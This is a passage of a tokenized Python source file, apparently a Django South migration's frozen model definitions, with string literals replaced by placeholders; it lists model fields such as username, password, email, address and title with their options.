'<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:address>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:url>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:address>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:max_length>' : '<STR_LIT:3>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:max_length>' : '<STR_LIT:3>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 